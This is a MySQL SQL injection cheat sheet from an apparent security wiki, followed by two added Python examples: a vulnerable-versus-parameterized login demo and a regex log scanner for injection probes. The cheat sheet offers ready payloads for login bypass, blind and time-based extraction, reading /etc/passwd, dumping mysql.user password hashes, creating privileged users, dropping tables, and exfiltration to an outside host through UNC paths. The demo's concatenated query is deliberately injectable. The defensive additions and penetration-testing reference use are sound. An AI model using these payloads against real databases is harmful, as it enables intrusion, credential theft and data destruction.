The SQL Injection Wiki project aims to provide all the bells and whistles of SQL Injection. It is a good reference both for seasoned web security professionals and for those who are just starting. The project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the databases listed below:

The SQL Injection Wiki is sponsored by Netsparker, an automated, false-positive-free web vulnerability scanner.

MySQL SQL Injection Cheat Sheet

Version           SELECT @@VERSION
                  SELECT version()
Current User      SELECT user()
                  SELECT system_user()
Current Database  SELECT database()


Error Based SQLi  For integer inputs:

 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

 For string inputs:

 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

 The attacks above should throw 'duplicate entry' errors.
Clear SQLi Tests  These tests are simply good for boolean SQL injection and silent attacks.

 product.php?id=4
 product.php?id=5-1
 product.php?id=4 OR 1=1
 product.php?id=-1 OR 17-7=10


Use this when you cannot see any difference in the output. Also, do not use more than 30 seconds, because the database API connection timeout could easily be reached.

 SLEEP(25)--    This is just like sleep: wait for the specified time. A CPU-safe way to make the database wait.
 SELECT BENCHMARK(1000000,MD5('A'));
Real World Samples  ProductID=1 OR SLEEP(25)=0 LIMIT 1--
 ProductID=1) OR SLEEP(25)=0 LIMIT 1--
 ProductID=1' OR SLEEP(25)=0 LIMIT 1--
 ProductID=1') OR SLEEP(25)=0 LIMIT 1--
 ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
 ProductID=SELECT SLEEP(25)--


DROP sampletable;--
DROP sampletable;#

Username : admin'--
         : admin' or '1'='1'--

SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

This logs you in as the admin user, because the rest of the SQL query is ignored.

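To see the login bypass above next to its fix, here is an added example that is not part of the wiki: it runs the string-concatenated query beside a parameterized one against an in-memory SQLite stand-in for the MySQL `members` table (rows are constructed; SQLite accepts the `--` comment the same way MySQL does here, since the rest of the query begins with a space).

```python
import sqlite3

# Constructed in-memory stand-in for the MySQL `members` table in the query above.
# Passwords are stored in plaintext only to keep the example short; a real
# application stores a salted password hash and compares against that instead.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT, role TEXT)")
    db.execute("INSERT INTO members VALUES ('admin', 's3cret', 'admin')")
    db.execute("INSERT INTO members VALUES ('alice', 'wonder', 'user')")
    db.commit()
    return db

def login_vulnerable(db, username, password):
    """String concatenation: admin'-- turns the password check into a comment."""
    sql = ("SELECT username FROM members WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, username, password):
    """Bound parameters: the driver passes the input as data, never as SQL text."""
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def demo():
    """Run both logins against the two payloads from the cheat sheet and valid credentials."""
    db = make_db()
    return {
        "vuln_comment_bypass": login_vulnerable(db, "admin'--", "anything"),
        "vuln_tautology": login_vulnerable(db, "admin' or '1'='1'--", "anything"),
        "safe_comment_bypass": login_parameterized(db, "admin'--", "anything"),
        "safe_tautology": login_parameterized(db, "admin' or '1'='1'--", "anything"),
        "safe_valid_login": login_parameterized(db, "admin", "s3cret"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Both payloads return a row from the concatenated query and nothing from the parameterized one, while the valid credentials still work.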

Comments out the rest of the query when you do not close them; you can also use them for bypassing blacklisting, removing spaces, obfuscating, and determining database versions.
  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable


Get a response based on an if statement. This is one of the key points of Blind SQL Injection; it can also be very useful to test simple things blindly and accurately.

MySQL If Statement

  • IF(condition, true-part, false-part)
  • SELECT IF(1=1, 'true', 'false')

If Statement SQL Injection Attack Samples

SELECT IF(user()='root@localhost','true','false')


SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

This will return 'KLM'.


Write the content of a table to a file.

SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --


' UNION ALL SELECT LOAD_FILE('/etc/passwd') --

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
This will show the content of c:\boot.ini.


Possible using UDFs (user-defined functions).

CREATE USER username IDENTIFIED BY 'password'; --


DROP USER username; --


GRANT ALL PRIVILEGES ON *.* TO username@'%';


  • SELECT * FROM mysql.user WHERE 1 LIMIT 0,30
  • SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
  • SELECT * FROM mysql.user


  • SELECT user, password FROM mysql.user
  • SELECT user, password FROM mysql.user LIMIT 1,1
  • SELECT password FROM mysql.user WHERE user = 'root'

On MySQL 5.7 and later the password hash lives in the authentication_string column of mysql.user; the password column no longer exists there.


  • SELECT schema_name FROM information_schema.schemata;
  • SELECT schema_name FROM information_schema.schemata LIMIT 1,1;


  • SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
  • SELECT Super_priv FROM mysql.user WHERE user='root' LIMIT 1,1--


SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'

tblUsers -> the database (schema) name whose tables you want to list


SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers';

tblUsers -> the database (schema) name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

Finds the tables that have a column called 'username'.

  • information_schema (MySQL >= 5.0)
  • mysql


  • SELECT @@datadir
  • Example result: C:\AppServ\MySQL\data\


?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTION}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--

{INJECTION} = the query you want to run.

If the condition is true, the response arrives after 14 seconds; if it is false, IF() returns 1 without sleeping and the response is not delayed.


?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))

Makes an NBNS query / DNS resolution request to yourhost.com.

?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')

Writes data to your shared folder/file.

{INJECTION} = the query you want to run.
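As an added example that is not part of the wiki, the following signature scan runs over constructed access-log lines carrying the probe shapes from the sections above (the clear/boolean tests, the time-based SLEEP payloads, the blind ASCII(MID()) extraction, the UNION/LOAD_FILE read and the INTO OUTFILE write); the log lines and signature names are constructed for this example. The arithmetic probe `id=5-1` is included deliberately: no signature fires on it, which is why such scanning supplements rather than replaces parameterized queries.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe families shown on this page (boolean tests, time-based
# SLEEP/BENCHMARK, blind character extraction, file read/write). They are a
# detection aid only; parameterized queries remain the actual fix.
SIGNATURES = {
    "boolean_probe": re.compile(r"\bOR\s+[\w']+\s*=\s*[\w']+", re.I),        # OR 1=1, OR '1'='1'
    "time_based":    re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),         # SLEEP(25), BENCHMARK(...)
    "blind_char":    re.compile(r"\b(ASCII|MID|SUBSTRING)\s*\(", re.I),     # ASCII(MID(...)) extraction
    "file_io":       re.compile(r"\bLOAD_FILE\s*\(|\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I),
    "union_select":  re.compile(r"\bUNION\b.*\bSELECT\b", re.I),
    "comment_tail":  re.compile(r"(--|#)\s*$"),                            # trailing line comment
}

def request_path(line):
    """Extract the request target from a combined-format access-log line and URL-decode it."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
    return unquote_plus(m.group(1)) if m else ""

def classify(line):
    """Return the sorted names of every signature that fires on one log line."""
    path = request_path(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(path))

def scan(log_text):
    """Map 1-based line numbers to their hits; lines with no hits are omitted."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        found = classify(line)
        if found:
            hits[n] = found
    return hits

# Constructed access-log sample: the first two requests are the quiet probes from the
# "Clear SQLi Tests" section, the rest carry payload shapes from the cheat sheet above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /product.php?id=4 HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2024:10:00:02 +0000] "GET /product.php?id=5-1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2024:10:00:03 +0000] "GET /product.php?id=4%20OR%201%3D1 HTTP/1.1" 200 9031
10.0.0.5 - - [10/Jan/2024:10:00:04 +0000] "GET /product.php?id=1%20OR%20SLEEP(25)%3D0%20LIMIT%201-- HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2024:10:00:30 +0000] "GET /product.php?id=-99%20OR%20IF((ASCII(MID((SELECT%20user()),1,1))%3D100),SLEEP(14),1)%3D0%20LIMIT%201-- HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2024:10:00:45 +0000] "GET /product.php?id='%20UNION%20ALL%20SELECT%20LOAD_FILE('/etc/passwd')%20-- HTTP/1.1" 200 4100
10.0.0.5 - - [10/Jan/2024:10:00:46 +0000] "GET /product.php?id=-99%20OR%20(SELECT%20(SELECT%20user())%20INTO%20OUTFILE%20'out.txt') HTTP/1.1" 500 220
"""
if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, ", ".join(found))
```

Lines 1 and 2 produce no hits; the remaining lines are flagged by one or more signatures, and the response-size jump on line 3 and the 26-second gap before line 5 are the kind of secondary evidence worth correlating with the signature hits.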